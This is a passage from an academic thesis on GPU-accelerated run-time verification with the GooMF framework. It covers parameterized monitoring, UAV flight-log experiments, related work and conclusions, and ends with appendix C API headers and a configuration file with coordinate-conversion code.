state in the monitor FSM , it is more difficult to do this for every parameter value. In
most cases, the domain of the defining and used variables in programs is unbound (think
about all possible file names for the file open–close property), which makes it virtually
impossible to predict. This is the reason why we adapted the finite-history algorithm for
parameterized properties, but not the infinite-history algorithm.
The above explanation illustrates the difficulties associated with incorporating param-
eters binding into the algorithms core. It is clear that every bind–unbind action changes
the state of the monitoring and, consequently, the performance of the parallel algorithms.
We revise the definition of the history and history length accordingly:
Definition 12 (History amid Parameterized Monitoring) Letφbe a parametric prop-
erty in Ltlmon
3andw∈Σωbe an infinite word. The history ofφwith respect to wis the
sequence of states Hφ
w=q0q1...ofMφ= (P,Σ∪P,Q,q 0,δ,Φ,ρ,λ), such that qi∈Qand
qi+1=δ(qi,wi), for alli≥0.
62
Definition 13 (History Length amid Parameterized Monitoring) Letφbe a para-
metric property in Ltlmon
3andw∈Σωbe an infinite word. The history length ofφwith
respect tow(denoted∥Hφ
w∥) is the number of state transitions in history Hφ
w=q0q1q2...,
such thatqi̸=qi+1orρ(qi,qi+1)̸=∅, for alli≥0. The history length of a property is then:
∥Hφ∥= max{∥Hφ
w∥|w∈Σω∧whas a minimal good /bad prefix}
The definitions of good and bad prefixes remain unchanged. The history length of
parametric property is at least the history length of same-structured non-parametric prop-
erty. As a history length of a property is a measure of performance of the finite-history
algorithm, the execution time of this algorithm on parametric properties is expected to
rise due to increased history length. The execution time of sequential and partial–offload
algorithms is expected to rise due to the bind–unbind actions, but not as significantly as
the execution time of the finite history algorithm.
5.3.2 GooMF and Parameterized Monitoring
GooMF implements parameterized monitoring only partially. Specifically, it allows mon-
itoring parametric properties with an empty set of defining variables. In other words,
GooMF can manage additional state introduced by used variables, but does not handle
online creation and destruction of monitoring instances introduced by defining variables.
In general, if defining variables set of the property is empty, it is enough to keep only the
current state for each monitoring instance and, consequently, for each property. Therefore,
the evolution from regular to parameterized monitoring is reduced to the following changes:
(1) for every property, the system should keep track not only of current monitor state, but
also of the current value of the parameters; (2) for every binding event, the parameter value
is updated with the value of used variable; (3) for every unbinding event, the parameter
value should be set the the “undefined” value.
As mentioned in Section 5.1, proper specification of parametric properties requires
specification formalism other then Ltl. To accommodate this requirement, GooMF allows
two formalisms for properties specification: Ltl andFSM .FSM should be used when
parametric properties are monitored. In this case, binding actions are specified on the
edges. This brings us to the question of FSM encoding in the code. If the FSM is
encoded as an array, the event of the monitor state update is merely an assignment to the
variable. On the contrary, if the FSM is encoded as a sequence of ifoperators, it will
allow arbitrary code to be inserted as a result of following the specific edge. Thus, the
choice of ifandFSM representation in the configuration file is obligatory if parametric
63
properties are to be monitored. Following is the proper example of parametric property
definition from GooMF configuration file:
properties = (
{name = "prop1"; formalism="LTL"; encoding = "array"; syntax = "[] (a && b)" },
{name = "prop2"; formalism="FSM"; encoding = "ifs"; syntax =
"digraph G{
(0, 0) -> (1, 1) [label = (e&&f), action = "used params->xtimestamp = gps second;
used params->x d = GetX(llh latdest, llh londest, llh altdest); used params->xtsat =
XTSAT;"];
(0, 0) -> (1, 1) [label = (e), action = "used params->xtimestamp = gps second;
used params->x d = GetX(llh latdest, llh londest, llh altdest); used params->xtsat =
XTSAT;"];
(0, 0) -> (0, 0) [label = (f)];
(0, 0) -> (0, 0) [label = (<empty>)];
(1, 1) -> (1, 1) [label = (e&&f)];
(1, 1) -> (-1, 2) [label = (e)];
(1, 1) -> (0, 0) [label = (f)];
(1, 1) -> (0, 0) [label = (<empty>)];
(-1, 2) -> (-1, 2) [label = (e&&f)];
(-1, 2) -> (-1, 2) [label = (e)];
(-1, 2) -> (-1, 2) [label = (f)];
(-1, 2) -> (-1, 2) [label = (<empty>)];
(-1, 2) [label=(-1, 2), style=filled, color=red]
(1, 1) [label=(1, 1), style=filled, color=pink]
(0, 0) [label=(0, 0), style=filled, color=darkseagreen1]
}"
});
Here, property prop1 is regular and property prop2 is parametric ( φ1from Section 5.1) in
AT&T FSM format. Two first transition lines (from state (0 ,0) to (1,1)) are instrumented
with the binding action.
Another aspect of GooMF that needed to be changed in order to accommodate param-
eterized monitoring is the input to the algorithm kernel. When using parallel algorithms,
the predicates are evaluated on the GPU side; hence, the parameters’ values should be
readily available to the GPU threads. This is the reason for keeping the special structure
of current parameters for all the parametric properties in the system. This structure passed
to the GPU upon every iteration of Algorithm 3.
5.3.3 Future Extensions
The infinite-history algorithm uses exhaustive computations to eliminate future dependen-
cies on the data. Particularly, it calculates future monitor state transitions given every
possible current monitor state. As such, it sacrifices the calculation time for the precise
64
future prediction of the next monitor state. Parameterized monitoring introduces addi-
tional uncertainty: to calculate the next monitor state, the algorithm has to know not
only current monitor state, but also values of the bound parameters if such exist. This
uncertainty spans over the domain of the variables. For example, for the classic open–close
property, the infinite-history algorithm has to figure out what file descriptors are to be
opened / closed. For some programs and parameters, this domain can be limited to several
values and known beforehand; for others the domain can be infinite. The algorithm can
get help from static analysis to learn about the domain of the parameters.
Another option is to employ a learning phase to learn about possible reduction of the
parameter domain. Off course, as the size of the domain grows, the performance of the
algorithm slows down. In its behavior, the size of the parameters domain is similar to the
number of the inconclusive states in the monitor FSM generated from the property.
5.4 Evaluation of Algorithms amid Parameterized Mon-
itoring
5.4.1 Experiment Setup
The goal of this experiment section is two-fold: (1) to assess the effect of the parameters
on the performance of sequential, partial–offload, and finite-history algorithms; (2) to
evaluate the performance of the partial–offload algorithm, missing from the evaluation
in Section 3.3. As mentioned in the previous section, parameterized monitoring leads to
an additional functional complexity and an additional amount of unpredictability. As a
result, the infinite-history algorithm cannot handle parametric properties and therefore, is
not included in current experiments.
As an input to the algorithms, we use the log file from the same UAV from the case
study in Subsection 3.3.3. The size of the log file is about 30,000 program states. It was
recorded during the flight conducted in September, 2012 near Greater Napanee, Ontario.
The flight’s purpose was to conduct the aerial inspection of the solar station and to pinpoint
possible problems with the structure of the solar plant. By using the same input for all
the experiments, we eliminate the need in throughput measurements. Instead, we measure
the execution time of the log analysis as a performance metric of the algorithms.
We use GooMF for the experiments. During the initialization phase, the program reads
the log file into the memory and then repeatedly calls for blocking GOOMF nextState() until
the end of the input log. This way the total execution time is not constrained by IO, but
65
only by verification time. The time measurement starts only after the first buffer of the
program states is processed. This allows GooMF to warm up and eliminates possible
time skew due to the initialization of the first buffer. All the experiments are conducted
on 32-bit Ubuntu Linux 11.10. The sequential algorithm measurements were collected
on AMD A6 3500 APU with 32GB of 1500MHz main memory. The parallel algorithms
run on AMD Radeon HD5870 discrete GPU and AMD Radeon HD6530 integrated GPU.
Every configuration of factors was tested 100 times, and confidence intervals were updated
accordingly.
We monitor the following three properties:
1. Convergence to the destination point for X axes: φ1=□(a→⃝ (bUc)))
2. Convergence to the destination point for Y axes: φ2=□(d→⃝ (eUf)))
3. Convergence to the destination point for altitude: φ3=□(g→⃝ (hUk)))
These properties verify the convergence towards new destination point over three axes.
Each property has three parameters: xd— new destination coordinate; timestamp —
timestamp of setting the new destination; and tsat— settling time. Once new destina-
tion coordinate xdis set, the UAV must be in the vicinity of this coordinate within tsat
seconds. Every time new destination coordinate is set, the monitor binds the parameters
and jumps to the next state. If the UAV is close enough, the monitor unbinds the param-
eters and jumps back. The property is violated if after tsatseconds the UAV is still too
far from the new destination. Predicates a,d,gstand for the condition of setting the new
destinations. Predicates b,e,hstand for time checking. Predicates c,f, andkinclude
checking of the UAV proximity to the destination. They also contain the conversion of the
coordinates from World Geodetic System (WGS) to Earth-Centered, Earth-Fixed (ECEF)
to East, North, Up (ENU) Cartesian coordinate system, and thus are especially rich in
mathematical operations. The computational load of each property is roughly equal to
14 trigonometric operations + 8 division operations + 2 square root operations + a set
of less computationally demanding multiplication, addition and subtraction operations.
For the full configuration file defining the properties, predicates, parameters, and program
variables for this section, refer to Appendix C.
66
0 50 100 150
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 50 100 150
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 50 100 150
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 25 50 75 100
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 25 50 75 100
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 25 50 75 100
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 25 50 75 100
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 25 50 75 100
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
0 25 50 75 100
0 2000 4000 6000 8000
Buffer Size [No. of program states]Execution Time [miliSec]
Finite−history on HD5870Partial−offload on HD6350Sequential algorithm
Finite−History on HD6350Partial−offload on HD58703
2
1
0 12 24No. of props
Horizontal:Vertical:
No. of new destinationsFigure 5.2: Algorithms execution times
67
5.4.2 Execution Time Analysis
Effect of the Parametric Load
We hypothesize that the execution time of the finite-history algorithm on the parametric
properties is expected to rise due to increased history length of the parametric properties.
We also believe that the execution times of sequential and partial–offload algorithms are
expected to rise due to the bind–unbind actions, but not as significantly as the execution
time of the finite-history algorithm. We regard this increase in execution time as parametric
load. To test the hypothesis, we conducted the experiments with increasing parametric
load. Originally, the number of destination points in the log file was 12. We modified the
log file to create two additional versions of the input with 0 and 24 destination points. Every
destination point set results in two jumps between the monitor states and, consequently,
in two finite-history algorithm iterations for each property.
Figure 5.2 shows the results of this experiment (the error bars on each one of the
graphs display the 95% statistical confidence interval). The external X-axis represent the
parametric load (0, 12, and 24 destination points). The first left-most column of figures
shows the execution times of the algorithms with 0 destination points. The middle column
of figures shows the execution times of the algorithms with 12 destination points. The right-
most column of figures shows the execution times of the algorithms with 24 destination
points. As expected, performance of the sequential algorithm (dashed line) and the partial–
offload algorithm (blue and red lines) does not change significantly. The execution time
of the finite-history algorithm (green and brown lines), on the other hand, grows with the
increase in destination points. The execution times of the finite-history and sequential
algorithms come closer as the effect from parameterized monitoring grows, although the
finite-history algorithm outperforms the sequential on all the scenarios when buffer size
reaches 2000 or more.
Effect of the Device
We hypothesize that the parallel algorithms run faster on HD6350 than on HD5870, be-
cause shared memory hierarchy on HD6350 results in faster memory transfer between the
CPU and the GPU. This is particularly true on the first column of experiments with 0
destination points. Parallel algorithms on integrated HD6350 exhibit similar behavior and
outperform the algorithms running on discrete HD5870. For all three computational loads,
the algorithms on HD6350 run twice as fast as those on HD5870. However, the parametric
68
load is a more dominant factor than the device type. On 12 and 24 destination points, the
finite-history algorithm is slower than the partial–offload algorithm for both devices.
Effect of the Computational Load
We hypothesize that computational load has the same effect on the algotihms employing
parameterized monitoring as on the algorithms that perform regular monitoring. Namely,
an advantage of the parallel algorithms over the sequential will grow with an increase in
computational load. To test the hypothesis, we conducted the experiments with three
different computational loads.
In Figure 5.2, the external Y-axis represent the computational load in number of mon-
itored properties. By utilizing the ability of GooMF to enable and disable properties,
we enable only one property in the bottom row of figures, two properties in the middle
row, and all three properties in the upper row. As predicted, performance of the sequential
algorithm doubles with every enabled property. This is due to the linear dependency of the
sequential algorithm on the computational load. This result conforms to the conclusions
from Subsection 3.3.2. The execution time of the parallel algorithms rises in much slower
pace than that of the sequential algorithm.
In general, for buffer size of 256 and more, the parallel algorithms are always preferable
over the sequential. The biggest gap in performance is reached with maximal compu-
tational load and minimal parametric load. Due to its immunity from parametric load
fluctuations, partial–offload algorithm showed good performance, especially on the third
column scenarios. Another intriguing result is the similarity in execution times between
the partial–offload and the finite-history algorithms. This result is yet to be examined to
find an explanation.
69
Chapter 6
Related Work
Several techniques have been introduced in the literature for reducing and controlling
run-time overhead, and each of the proposed approaches remedies the overhead issue to
some extent and in specific contexts. To the best of our knowledge, this work is the first
that combines the following: (1) using non-dedicated parallel architecture (GPU) and (2)
systematic and formal verification of properties at a run time in a parallel fashion. The
suggested architecture allows efficient reduction of the monitoring time originated from
properties evaluation and from monitor–program resource-sharing conflicts. In general, we
identified four main sources of the monitoring overhead:
1. Invocation of a monitor
2. Calculation and evaluation of property predicates given a program state
3. Possible slowdown due to program instrumentation and program trace extraction
4. Possible interference between a program and a monitor, as monitor shares resources
with a program
The overhead caused by each of the above items can be minimized up to a certain degree
and in specific contexts. Following is the list of proposed approaches that target overhead
originated from the different sources:
•Improved instrumentation (e.g., using aspect-oriented programming [12, 38]) — tar-
gets sources 1,3
70
•Combining static and dynamic analysis techniques (e.g., using typeset analysis [8]
and PID controllers [25]) — targets sources 1,3
•Efficient monitor generation and management (e.g., in the case of parametric moni-
tors [32]) — targets source 2
•Schedulable monitoring (e.g., using time-triggered monitors [10]) — targets sources 1,3,4
The main focus in the literature of run-time verification is on event-triggered monitors
[29], where every change in the state of the system triggers the monitor for analysis. Alter-
natively, in time-triggered monitoring [10], the monitor samples the state of the program
under inspection in regular time intervals. The latter approach involves an optimization
problem that aims at minimizing the size of auxiliary memory needed for state reconstruc-
tion at sampling time. Several heuristics have been introduced to tackle the high complexity
of the optimization problem [33]. Similar concept of predictable run-time monitoring was
proposed in [43], where authors suggest to bind the latency of the error detection by pre-
senting the concepts of monitoring budgets and violation detection latency specifications.
All these works, however, utilize sequential monitoring techniques.
There is a body of works that aim at reducing the run-time overhead through an addi-
tional pre-processing phase. In [8], the authors use static analysis to reduce the number of
residual run-time monitors. The framework in [9] statically optimizes monitoring aspects.
Although the objective of this thesis is also reducing the run-time overhead, GPU-based
run-time monitoring targets shipping the monitoring costs to a different processing unit.
Thus, our approach is orthogonal to the existing approaches in run-time monitoring.
This work proposes to offload the monitoring process to the GPU or other many-
core platform parallel to the CPU (which already carries the execution of the inspected
program). There are already several works that aim to reduce the overhead by isolating the
monitor in a separate processing unit. For example, parallel monitoring has been addressed
in [23] by focusing on low-level memory architecture to facilitate communication between
application and analysis threads. This approach is not quite relevant to the proposed
method in this thesis. The concept of separation of a monitor from the monitored program
is also considered in [44, 43, 34]. However, to the best of our knowledge, our work is the
first that combines both using non-dedicated parallel architecture (GPU) and systematic
and formal verification of properties at a run time in a parallel fashion. Specifically, in [44]
the authors suggest using a dedicated co-processor as a parallel profiling architecture.
This co-processor implements some common profiling operations as hardware primitives.
Similar to our method, instead of interrupting the processor after every sample, multiple
71
program samples are pre-processed and buffered into a 1 Kbuffer before processing. The
work in [44, 34] also concentrate on hardware-based monitoring and, hence, the need in
a dedicated hardware. On the contrary, our approach utilizes the available many-core
platform (GPU or multi-core CPUs) in a computing system.
Finally, in [19] the authors propose using GPU for run-time monitoring, but their
approach is limited to data race detection scenarios and not a general formal specification
language such as Ltl. Consequently, no systematic approach is proposed for generating the
code that runs on GPU. For instance, to run experiments, the authors have parallelized
ERASER and GOLDILOC algorithms and adjusted them to the syntax of CUDA. In
addition, the authors do not resolve interdependencies in data frames. More importantly,
their approach is not sound and may result in obtaining false positives.
Sections 1.2, 4.1, 5.2 present an extensive discussion about existing run-time verification
tools and frameworks. We shortly mentioned JavaMaC [28], RuleR [4], Eagle [3], Trace-
matches [1], Spec# [2], P2V [31] and Temporal Rover [17]. We also discussed in detail
J-Lo [7] and JavaMOP [26]. We outlined the common characteristics of the existing tools
and identified theirs most successful features.
72
Chapter 7
Conclusions and Future Work
We have presented a concept of parallel run-time verification. The proposed architecture
exploits two levels of parallelisms: (1) parallelism between the inspected program and the
monitor, and (2) data-level parallelism that allows to evaluate monitor state over multiple
program states in parallel. This design reduces the run-time overhead caused by run-time
verification and isolates the monitoring module in a separate platform.
The major contributions of this work are the set of novel verification algorithms (Chap-
ter 3) and the monitoring framework for run-time verification of C and C++ programs
(Chapter 4). We explored the influence of different factors on the performance of the
algorithms, and also presented their practical application on the example of the UAV
(Section 3.3). In addition to minimized execution overhead, utilization of the parallel al-
gorithms on practice resulted in significant reduction in power consumption of the system.
Further, we presented a partial integration of parameterized monitoring and our al-
gorithms. Although more powerful in terms of expressiveness, parameterized monitoring
introduces additional slowdown in the performance of the algorithms. This tradeoff is
explored in experiment Section 5.4.
GooMF source code and documentation are available on
https://bitbucket.org/sberkovich/goomf .
7.1 Fitness for Properties
The proposed set of algorithms consists of four algorithms and forms an hierarchy based
on the involvement of the GPU in the verification process. In the experimental sections,
73
we explored the influence of different factors on the performance of the algorithms. In
addition, we used history length of the property to predict the performance of the finite-
history algorithm. We summarize the most influencing factor effects on the performance
of the algorithms:
1. Execution time of the sequential algorithm rises at least linearly with increase in
computational volume and number of properties.
2. As history length of the property rises, so does the execution time of the finite-history
algorithm. History length of the monitored properties does not affect the execution
time of the infinite-history algorithm.
3. As a number of inconclusive states in monitor rises, so does the execution time of
the infinite-history algorithm. Number of inconclusive states does not affect the
execution time of the finite-history algorithm.
4. GPU-based monitoring is more power-efficient than CPU-based monitoring.
In general, we have shown that given a considerable amount of computations in the
properties, the parallel algorithms are advantageous. The same may apply to the large set
of computationally trivial properties, just because the sequential execution time grows lin-
early with the number of monitored properties. Partial–offload algorithm is beneficial for
monitoring process with a majority of trivial properties and some computationally inten-
sive properties. In this case, the most “heavy” predicates may be offloaded to GPU. This
partial–offload ability makes this algorithm perfect compromise between fully parallel and
fully sequential algorithms. When a monitoring is mostly event-based, and predicates eval-
uations are trivial, sequential algorithm will be the algorithm of choice. Finally, if energy
efficiency is a priority, GPU-based verification is preferable over CPU-based verification.
Off course, the actual execution time will depend also on the actual program trace.
This closely correlates with the area of applicability of the inspected program. In some
cases, only a developer or an end-user can tell how likely the certain condition to happen
and how many times. And consequently, how many monitor state transitions are expected
to occur. Consider, for example, the properties from Section 5.4. The performance of the
finite-history algorithm depends directly on the number of times the new destination point
will be set during the UAV flight.
This brings us to an additional aspect that affects the algorithms’ performance —
number of parametric bindings. As shown in Section 5.1, a history of the property is
74
affected by a number and a location of a parameters bind–unbind actions. In Section 5.4,
this aspect is represented by the factor of the number of new UAV destinations.
Another factor to consider when choosing among the algorithms, is the tolerable delay
of the program under inspection. The parallel algorithms are only suitable for systems that
can tolerate delay resulted from buffering the program states and verifying all the batch
in parallel. If the question of delay is critical, the maximal reaction time can be calculated
given the length of the buffer, the size of the program state snapshot, and the speed of the
bus.
To summarize, a set of considerations needs to be taken into account when deciding
about the instance of the optimal verification algorithm. However, the action of choosing
among the algorithms is simplified by GooMF ability to switch among the algorithms by
merely modifying one parameter in GOOMF initContext() function.
7.2 Further Research Directions
Several possible directions for further research exist. In [42], the authors propose a novel
verification approach — hybrid monitoring . At a run time, the monitor switches between
the event-triggered and the buffer-triggered modes to minimize the overhead resulted from
the invocation of the monitor. The logic of switching between the monitoring modes could
be incorporated into GooMF and be based not only on monitor invocation times, but
also on reliable verification times. In this case, it will run in buffer-triggered mode, but
will alter the maximal buffer size at a run time. Another step in this direction is allowing
GooMF to choose automatically among the verification algorithms. This will probably
require additional AI module and some kind of learning phase.
The last version of OpenCL (1.2) introduced new capability: “fission” (i.e. split) a
single device into multiple sub-devices at run time. This gives a program greater freedom in
assigning work to specific cores, allowing for task-level parallelism and/or better exploita-
tion of temporal and spatial cache locality [35]. This feature can be used in GooMF to
assign different properties to different sub-devices, thus achieving not only data-level par-
allelism, but also functional-level parallelism. Intuitively, number of processing elements
in a sub-device assigned to a specific property, can vary according to the computational
load that this property introduces.
One of the possible directions to further minimize monitoring overhead is to priori-
tize the monitored properties. This method is particularly applicable when strict time
constraints are given that cannot be violated. In [5], the authors propose to shut down
75
monitors based on estimation of their proximity to satisfaction / violation. Instead, the
monitoring module can disable less important properties, and leave critical properties alive.
Due to its ability to work in Offline mode, GooMF can be used for offline–online log
monitoring. There are several interesting works in this area. For example, in [20], the
authors propose to use Ltl-based specification formalisms to enforce privacy legislation
rules from Health Insurance Portability and Accountability Act (HIPAA). As our verifi-
cation algorithms are capable of analyzing any deterministic FSM, GooMF can be easily
converted into the offline log checker. The same can be done with online sniffing of the
network traffic. In fact, the rules of the network intrusion detection system SNORT [37]
are all stateless properties and can be easily expressed with Ltl.
Finally, complementing GooMF with code–instrumentation front end will be a logical
next step. By implementing RiTHM, we made a first step towards providing the solution
that combines automatic instrumentation and verification. The front-end instrumentation
provided by RiTHM is very specific and bounded to specific time-triggered monitoring
solutions. Using AspectC as a front end for GooMF will offer flexible instrumentation
front end without restrictions on instrumentation points and type of inspected programs.
76
APPENDICES
77
Appendix A
GooMF Online API Header
#ifndef GOOMFONLINEAPI_H_
#define GOOMFONLINEAPI_H_
#include <stdbool.h>
#include <stdio.h>
#define MAIN_FUNCTION_NAME "verification"
/*********************** errors declarations ****************************/
#define _GOOMF_SUCCESS (0)
#define _GOOMF_NO_CONTEXT_ERROR (-1)
#define _GOOMF_MALLOC_ERROR (-2)
#define _GOOMF_ARGUMENT_ERROR (-3)
#define _GOOMF_CL_CONTEXT_ERROR (-4)
#define _GOOMF_CL_DEVICE_ERROR (-5)
#define _GOOMF_CL_PROGRAM_ERROR (-6)
#define _GOOMF_CL_QUEUE_ERROR (-7)
#define _GOOMF_CL_BUILD_ERROR (-8)
#define _GOOMF_CL_KERNEL_ERROR (-9)
#define _GOOMF_CL_ALLOCATE_ERROR (-10)
#define _GOOMF_CL_KERNEL_ARGUMENT_ERROR (-11)
#define _GOOMF_CL_MEMORY_WRITE_ERROR (-12)
#define _GOOMF_CL_KERNEL_RUN_ERROR (-13)
78
#define _GOOMF_CL_MEMORY_READ_ERROR (-14)
#define _GOOMF_CALLBACK_ERROR (-15)
#define _GOOMF_BUFFER_SIZE_ERROR (-16)
#define _GOOMF_THREAD_ERROR (-17)
#define _GOOMF_PARTIAL_OFFLOAD_ERROR (-18)
/*************************** types declarations *************************/
//type for the fsm state
typedef enum{_GOOMF_enum_sat = 0, _GOOMF_enum_psat, _GOOMF_enum_pviol,
_GOOMF_enum_viol} _GOOMF_enum_verdict_type;
//type for the trigger that triggers the flush of the program trace
typedef enum{_GOOMF_enum_no_trigger = 0, _GOOMF_enum_buffer_trigger,
_GOOMF_enum_time_trigger} _GOOMF_enum_trigger_type;
//type for the GooMF_flush() invocation - synchronous (blocking) or
//asynchronous (non-blocking)
typedef enum{_GOOMF_enum_sync_invocation = 0, _GOOMF_enum_async_invocation}
_GOOMF_enum_invocation_type;
//enum for algorithm type
typedef enum{_GOOMF_enum_alg_seq = 0,
_GOOMF_enum_alg_partial_offload,
_GOOMF_enum_alg_finite,
_GOOMF_enum_alg_infinite} _GOOMF_enum_alg_type;
//type for GOOMF monitoring context structure that keeps the current
//state of the monitor
typedef struct _GOOMF_context_struct* _GOOMF_context;
//type for the callback function to call upon the property convergence
typedef int (*report_handler_type)
(int prop_num, _GOOMF_enum_verdict_type verdict_type,
const void* program_state);
/************************* functions declarations *************************/
79
/*
* Allocates and initializes the monitoring context structure along
* with all other initialization stuff
* - context - the structure to be allocated
* - trigger_type - triggers the program trace flush
* - device type - device the monitoring is performed on
* - buffer_size - if trigger is _GOOMF_enum_buffer_trigger,
* specify the maximal size of the buffer
*/
extern int _GOOMF_initContext(_GOOMF_context* context,
_GOOMF_enum_trigger_type trigger_type,
//_GOOMF_enum_device_type device_type,
_GOOMF_enum_alg_type alg_type,
_GOOMF_enum_invocation_type invocation_type,
int buffer_size);
/*
* Destroys context structure allocated previously
* - context - the structure to be destroyed
*/
extern int _GOOMF_destroyContext(_GOOMF_context* context);
/*
* Copy next program state to the buffer and flush if needed
* - context - GooMF monitoring context
*/
extern int _GOOMF_nextState(_GOOMF_context context,
void* program_state_ptr);
/*
* Process event, copy next program state to the buffer and flush if needed
* - context - GooMF monitoring context
* - var_order - order of the variable in program state that changed
* - var_value - new value of the variable
*/
extern int _GOOMF_nextEvent(_GOOMF_context context, unsigned int var_order,
void* var_value);
80
/*
* Register report callback for specific property
* - prop_num - report callback is called if this property has converged
* - report_handler - callback function to call; should be concise as it
* called during the processing
*/
extern int _GOOMF_registerReport(_GOOMF_context context, int prop_num,
report_handler_type report_handler);
/*
* Unregister report callback for specific property
* - prop_num - report callback is called if this property has converged
* - report_handler - callback function to call
*/
extern int _GOOMF_unregisterReport(_GOOMF_context context, int prop_num);
/*
* Enables monitoring of the specific property
* - context - GooMF monitoring context
* - prop_num - property to enable
*/
extern int _GOOMF_enableProperty(_GOOMF_context context, int prop_num);
/*
* Disables monitoring of the specific property
* - context - GooMF monitoring context
* - prop_num - property to disable
*/
extern int _GOOMF_disableProperty(_GOOMF_context context, int prop_num);
/*
* Resets the property to the initial monitoring state
* - context - GooMF monitoring context
* - prop_num - property to reset
*/
extern int _GOOMF_resetProperty(_GOOMF_context context, int prop_num);
/*
81
* Force flush of the content of the buffer
* - context - GooMF monitoring context
*/
extern int _GOOMF_flush(_GOOMF_context context);
/*
* Get current status of all properties
* - context - GooMF monitoring context
* - verdict - output array of the statuses; it is the responsibility
* of the caller to deallocate it
*/
extern int _GOOMF_getCurrentStatus(_GOOMF_context context,
_GOOMF_enum_verdict_type* verdict);
/*
* Translate verdict to string
* - verdict - verdict
* - str - output string containing the verdict phrase
*/
extern int _GOOMF_typeToString(_GOOMF_enum_verdict_type* verdict,
char* str);
/*
* Check if all properties has converged (either satisfied or violated)
* - context - GooMF monitoring context
*/
extern bool _GOOMF_allPropertiesConverged(_GOOMF_context context);
/*
* Set the logger to log the basic events
* - context - GooMF monitoring context
* - logger - file descriptor to write into. Assuming the descriptior is
* open. It is the responsibility of the caller to open and
* close the stream.
*/
extern int _GOOMF_setLogger(_GOOMF_context context, FILE* logger);
/*
82
* Translate status to the meaningful sentence. It is the responsibility
* of the caller to allocate a string for the message
* - result - status
*/
extern int _GOOMF_getErrorDescription(int result, char* message);
#endif /* GOOMFONLINEAPI_H_ */
83
Appendix B
GooMF Offline API Header
#ifndef GOOMFOFFLINEAPI_H_
#define GOOMFOFFLINEAPI_H_
#include "GooMFOnlineAPI.h"
/********************** function callbacks types ***********************/
/*
* This function is called to open input data stream.
* - Should return negative number in case of failure or non-negative in
* case of success
*/
typedef int (*open_handler)();
/*
* This function is called to parse next program state from input data
* stream. The next program state should be placed into next_program_state.
* - Should return negative number in case of failure or non-negative
* in case of success.
*/
typedef int (*get_next_state_handler)(void* next_program_state_ptr);
/*
* This function is called to close the input data stream.
* - Should return negative number in case of failure or non-negative
84
* in case of success
*/
typedef int (*close_handler)();
/*
* This function is called upon any property convergence; should be
* concise as it called during the processing
* - prop_num - number of converged property
* - verdict_type - violation/satisfaction
* - program_state - program state that caused the convergence
* - Should return negative number in case of failure or non-negative
* in case of success.
*/
typedef int (*report_handler_type)
(int prop_num, _GOOMF_enum_verdict_type verdict_type,
const void* program_state);
/************************ functions ************************************/
/*
* Analyzer function - uses provided callback functions to analyze the
* input data stream
* - trigger_type - triggers the program trace flush
* - device type - device the monitoring is performed on
* - buffer_size - if trigger is _GOOMF_enum_buffer_trigger, specify the
* maximal size of the buffer
*/
extern int _GOOMF_analyze(open_handler oh_callback,
get_next_state_handler gnsh_callback,
close_handler ch_callback,
report_handler_type rh,
_GOOMF_enum_trigger_type trigger_type,
//_GOOMF_enum_device_type device_type,
_GOOMF_enum_alg_type alg_type,
_GOOMF_enum_invocation_type invocation_type,
FILE* logger,
unsigned int buffer_size);
85
#endif /* GOOMFOFFLINEAPI_H_ */
86
Appendix C
Configuration File Example
//A configuration file that describes monitoring objects
//name of the process under scrutiny
program_name = "ParametricUAV";
//user functions
functions = (
"const float XDELTA = 1.0;",
"const float YDELTA = 1.0;",
"const float ZDELTA = 1.0;",
"const long XTSAT = 100; //settling time for x position",
"const long YTSAT = 100; //settling time for y position",
"const long ZTSAT = 100; //settling time for z position",
"bool IMUSanityCheckPhi(float phi1, float teta1, float phi2, float p1,
float q1, float r1, float delta)
{
float temp = ((phi2 - phi1) / 0.01) -
(p1 + q1*sin(phi1)*tan(teta1) + r1*cos(phi1)*tan(teta1));
return (temp < delta && temp > -delta);
}",
"bool IMUSanityCheckTeta(float phi1, float teta1, float teta2,
float q1, float r1, float delta)
{
float temp = ((teta2 - teta1) / 0.01) -
87
(q1*cos(phi1) - r1*sin(phi1));
return (temp < delta && temp > -delta);
}",
"bool IMUSanityCheckKsi(float phi1, float teta1, float ksi1,
float ksi2, float q1, float r1, float delta)
{
float temp = ((ksi1 - ksi1) / 0.01) -
(q1*sin(phi1)/cos(teta1) + r1*cos(phi1)/cos(teta1));
return (temp < delta && temp > -delta);
}",
"/*
* Converts LLH to XYZ in the ECEF frame using WGS84 convention
* Parameters: float lat, float lon, float alt is the LLH coordinates,
* float* X, float* Y, float* Z is the memory where the
* solution will be stored
*/
void Convert_WGS84_To_ECEF(float lat, float lon, float alt, float* X,
float* Y, float* Z)
{
//Need to convert lat and lon to radians first
lat = (lat/180)*3.14159265;
lon = (lon/180)*3.14159265;
//WGS84 parameters
float a = 6378137; //semi-major axis of earth
//float b = 6356752.314245; //semi-minor axis of earth
//float e2 = ((a*a)-(b*b))/(a*a); //first eccentricity squared
float e2 = 0.00669437999014;
//Geodetic to ECEF coordinates
//normal: distance from surface to the Z axis along the ellipsoid normal
float N = a/(sqrt(1-(e2*pow(sin(lat),2))));
*X = (N+alt)*cos(lat)*cos(lon);
*Y = (N+alt)*cos(lat)*sin(lon);
*Z = (N*(1-e2)+alt)*sin(lat);
}",
"/*
88
* Converts ECEF to ENU
* Parameters: float dx, float dy, float dz are ECEF displacements between
* desired position and ENU origin
* float* x, float* y, float* z is the memory where the ENU solution will
* be stored
*/
void Convert_ECEF_To_ENU(float lat_origin, float lon_origin, float dx,
float dy, float dz, float* x, float* y, float* z)
{
//first convert lat and lon to radians
float lat = (lat_origin/180)*3.14159265;
float lon = (lon_origin/180)*3.14159265;
*x = (-1*sin(lon)*dx)+(cos(lon)*dy);
*y = (-1*sin(lat)*cos(lon)*dx)+(-1*sin(lat)*sin(lon)*dy)+(cos(lat)*dz);
*z = (cos(lat)*cos(lon)*dx)+(cos(lat)*sin(lon)*dy)+(sin(lat)*dz);
}",
"/*
* Converts LLH in WGS84 standard to ENU
